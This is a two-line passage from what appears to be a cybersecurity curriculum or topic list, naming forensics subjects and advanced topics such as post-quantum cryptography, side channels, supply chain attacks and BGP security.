  • Forensics: Memory forensics, disk forensics, order of volatility
  • Advanced topics: Post-quantum crypto, side channels, supply chain attacks, microservices security, BGP security
